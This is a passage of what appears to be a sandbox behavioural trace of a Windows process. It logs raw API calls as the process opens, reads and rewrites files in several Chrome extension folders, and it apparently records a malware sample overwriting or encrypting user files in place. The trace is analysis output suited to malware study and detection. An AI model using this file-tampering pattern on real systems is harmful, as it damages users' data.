hFile=0x210, lpBuffer=0x26c5228, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5228*, lpNumberOfBytesRead=0x311f2bc*=0xde, lpOverlapped=0x0) returned 1 [0164.918] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.918] WriteFile (in: hFile=0x210, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x666, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x311f2d0*=0x666, lpOverlapped=0x0) returned 1 [0164.919] CloseHandle (hObject=0x210) returned 1 [0164.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.920] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.920] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe4 [0164.920] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.920] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.920] ReleaseMutex (hMutex=0x168) returned 1 [0164.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.920] ReadFile (in: hFile=0x210, lpBuffer=0x26c5228, nNumberOfBytesToRead=0xe4, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5228*, lpNumberOfBytesRead=0x311f2bc*=0xe4, lpOverlapped=0x0) returned 1 [0164.921] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.921] WriteFile (in: hFile=0x210, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x66c, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x311f2d0*=0x66c, lpOverlapped=0x0) returned 1 [0164.922] CloseHandle (hObject=0x210) returned 1 [0164.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.922] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.923] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xde [0164.923] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.923] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.923] ReleaseMutex (hMutex=0x168) returned 1 [0164.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.923] ReadFile (in: hFile=0x210, lpBuffer=0x26c5228, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5228*, lpNumberOfBytesRead=0x311f2bc*=0xde, lpOverlapped=0x0) returned 1 [0164.924] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.924] WriteFile (in: hFile=0x210, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x666, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x311f2d0*=0x666, lpOverlapped=0x0) returned 1 [0164.925] CloseHandle (hObject=0x210) returned 1 [0164.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.925] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.926] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x10e [0164.926] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.926] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.926] ReleaseMutex (hMutex=0x168) returned 1 [0164.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.926] ReadFile (in: hFile=0x210, lpBuffer=0x1ef2258, nNumberOfBytesToRead=0x10e, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2258*, lpNumberOfBytesRead=0x311f2bc*=0x10e, lpOverlapped=0x0) returned 1 [0164.927] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.927] WriteFile (in: hFile=0x210, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x696, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x311f2d0*=0x696, lpOverlapped=0x0) returned 1 [0164.927] CloseHandle (hObject=0x210) returned 1 [0164.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.928] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.928] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5c [0164.928] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.928] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.928] ReleaseMutex (hMutex=0x168) returned 1 [0164.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.html", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0164.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.html", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.html", lpUsedDefaultChar=0x0) returned 9 [0164.929] ReadFile (in: hFile=0x210, lpBuffer=0x1fbad08, nNumberOfBytesToRead=0x5c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad08*, lpNumberOfBytesRead=0x311f2bc*=0x5c, lpOverlapped=0x0) returned 1 [0164.930] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.930] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x5e4, lpOverlapped=0x0) returned 1 [0164.930] CloseHandle (hObject=0x210) returned 1 [0164.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.931] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.931] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xd9 [0164.931] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.931] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.931] ReleaseMutex (hMutex=0x168) returned 1 [0164.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.931] ReadFile (in: hFile=0x210, lpBuffer=0x26c5228, nNumberOfBytesToRead=0xd9, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5228*, lpNumberOfBytesRead=0x311f2bc*=0xd9, lpOverlapped=0x0) returned 1 [0164.933] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.933] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x661, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x661, lpOverlapped=0x0) returned 1 [0164.933] CloseHandle (hObject=0x210) returned 1 [0164.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.934] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.934] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xdb [0164.934] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.934] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.934] ReleaseMutex (hMutex=0x168) returned 1 [0164.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.934] ReadFile (in: hFile=0x210, lpBuffer=0x26c5228, nNumberOfBytesToRead=0xdb, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5228*, lpNumberOfBytesRead=0x311f2bc*=0xdb, lpOverlapped=0x0) returned 1 [0164.935] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.936] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x663, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x663, lpOverlapped=0x0) returned 1 [0164.936] CloseHandle (hObject=0x210) returned 1 [0164.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.938] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.938] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xda [0164.938] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.938] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.938] ReleaseMutex (hMutex=0x168) returned 1 [0164.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.938] ReadFile (in: hFile=0x210, lpBuffer=0x26c5228, nNumberOfBytesToRead=0xda, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5228*, lpNumberOfBytesRead=0x311f2bc*=0xda, lpOverlapped=0x0) returned 1 [0164.939] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.939] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x662, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x662, lpOverlapped=0x0) returned 1 [0164.940] CloseHandle (hObject=0x210) returned 1 [0164.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.940] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.941] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xd0 [0164.941] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.941] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.941] ReleaseMutex (hMutex=0x168) returned 1 [0164.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.941] ReadFile (in: hFile=0x210, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x311f2bc*=0xd0, lpOverlapped=0x0) returned 1 [0164.943] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.943] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x658, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x658, lpOverlapped=0x0) returned 1 [0164.943] CloseHandle (hObject=0x210) returned 1 [0164.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.944] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.944] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe3 [0164.944] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.944] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.945] ReleaseMutex (hMutex=0x168) returned 1 [0164.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.945] ReadFile (in: hFile=0x210, lpBuffer=0x26c5228, nNumberOfBytesToRead=0xe3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5228*, lpNumberOfBytesRead=0x311f2bc*=0xe3, lpOverlapped=0x0) returned 1 [0164.946] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.946] WriteFile (in: hFile=0x210, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x66b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x311f2d0*=0x66b, lpOverlapped=0x0) returned 1 [0164.946] CloseHandle (hObject=0x210) returned 1 [0164.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.947] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.947] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3ec [0164.947] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.948] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.948] ReleaseMutex (hMutex=0x168) returned 1 [0164.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0164.948] ReadFile (in: hFile=0x210, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x3ec, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x311f2bc*=0x3ec, lpOverlapped=0x0) returned 1 [0165.160] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0165.160] WriteFile (in: hFile=0x210, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x974, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, 